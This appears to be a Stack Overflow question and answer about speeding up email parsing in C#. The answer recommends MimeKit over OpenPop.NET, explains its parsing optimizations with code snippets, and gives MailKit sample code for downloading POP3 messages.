But I want to make it faster than the OpenPop.dll approach above, so please let me know if there are any other techniques for parsing mails.
Please check the code and then tell me.
Thanks in advance.
But I want to make it faster than the OpenPop.dll approach above, so please let
me know if there are any other techniques for parsing mails.
In your GetMessageContent() method, the one place that consumes the vast majority of the time is:
objMessage = objPOP3Client.GetMessage(intMessageNumber);
The network I/O part of downloading a message cannot really be optimized, but OpenPop.NET's parser is slow (based on my own performance tests).
MimeKit is 25x faster than OpenPop.NET at parsing email messages.
One of the main performance problems in OpenPop.NET's MIME parser is the fact that it uses a StreamReader for parsing (which is slow due to unnecessary charset conversion, reading 1 line at a time, etc - I have an analysis of another email library that uses StreamReader for parsing here: https://stackoverflow.com/a/18787176/87117).
Then there's the problem that OpenPop.NET's parser also uses Regex to remove CFWS (Comments and Folding White Space) from a header string before parsing/decoding it. This is expensive. It's far better to write a good tokenizer that can deal with CFWS.
If you are interested in some of the other techniques I used to optimize MimeKit to be so fast (as fast or faster than highly optimized C implementations), I wrote some blog posts about this:
Optimization Tricks used by MimeKit: Part 1
The summary of the optimization I talk about in part 1 is replacing loops like this that scan for the end of a line:
while (*inptr != (byte) '\n')
inptr++;
with a faster loop, like this:
// Scan 4 bytes at a time: XOR with 0x0A0A0A0A zeroes out any byte equal to
// '\n', and the classic (x - 0x01010101) & ~x & 0x80808080 test is non-zero
// if and only if one of those 4 bytes was zero, i.e. a '\n' was found.
int* dword = (int*) inptr;
do {
    mask = *dword++ ^ 0x0A0A0A0A;
    mask = ((mask - 0x01010101) & (~mask & 0x80808080));
} while (mask == 0);
// Step back to the matching 4-byte word and find the exact '\n' byte by byte.
inptr = (byte*) (dword - 1);
while (*inptr != (byte) '\n')
    inptr++;
which improved performance by 20% (although on non-x86 architectures, it requires 'dword' to be 4-byte aligned).
Optimization Tricks used by MimeKit: Part 2
In part 2, I talk about writing a more optimized version of System.IO.MemoryStream. The problem with MemoryStream is that it has to keep one contiguous block of memory holding the content, which means that as you write more data to it and it has to resize its internal byte array, it has to copy the content to the new array (which is expensive, especially once the amount of data in the stream is large).
To work around this performance bottleneck, I wrote a MemoryBlockStream which does not need to use a contiguous block of memory - it uses a linked list of byte arrays. Instead of having to resize the byte array when you overflow the current buffer, it simply allocates another 2048-byte array for the data to overflow into and appends it to the linked list (see the sketch below).
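To make the idea concrete, here is a much simplified sketch of that kind of block-based buffer; this is my own illustration of the data structure, not MimeKit's actual MemoryBlockStream: growth never copies existing data, it only appends another fixed-size block to the list.
using System;
using System.Collections.Generic;

class BlockBuffer
{
    const int BlockSize = 2048;
    readonly List<byte[]> blocks = new List<byte[]>();
    int usedInLastBlock = BlockSize; // forces the first Write to allocate a block

    public void Write(byte[] data, int offset, int count)
    {
        while (count > 0)
        {
            if (usedInLastBlock == BlockSize)
            {
                blocks.Add(new byte[BlockSize]); // grow without copying old data
                usedInLastBlock = 0;
            }
            int n = Math.Min(count, BlockSize - usedInLastBlock);
            Buffer.BlockCopy(data, offset, blocks[blocks.Count - 1], usedInLastBlock, n);
            usedInLastBlock += n;
            offset += n;
            count -= n;
        }
    }
}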
Note: MimeKit itself only does email parsing, it doesn't do POP3 or SMTP or IMAP. If you want that kind of functionality, I've also written a library built on MimeKit that does that as well: MailKit
Update:
Sample code using MailKit (as requested) to download/parse all messages:
using System;
using System.Net;
using MailKit.Net.Pop3;
using MailKit;
using MimeKit;
namespace TestClient {
class Program
{
public static void Main (string[] args)
{
using (var client = new Pop3Client ()) {
client.Connect ("pop.gmail.com", 995, true);
// Note: since we don't have an OAuth2 token, disable
// the XOAUTH2 authentication mechanism.
client.AuthenticationMechanisms.Remove ("XOAUTH2");
client.Authenticate ("joey@gmail.com", "password");
int count = client.GetMessageCount ();
for (int i = 0; i < count; i++) {
var message = client.GetMessage (i);
Console.WriteLine ("Subject: {0}", message.Subject);
}
client.Disconnect (true);
}
}
}
}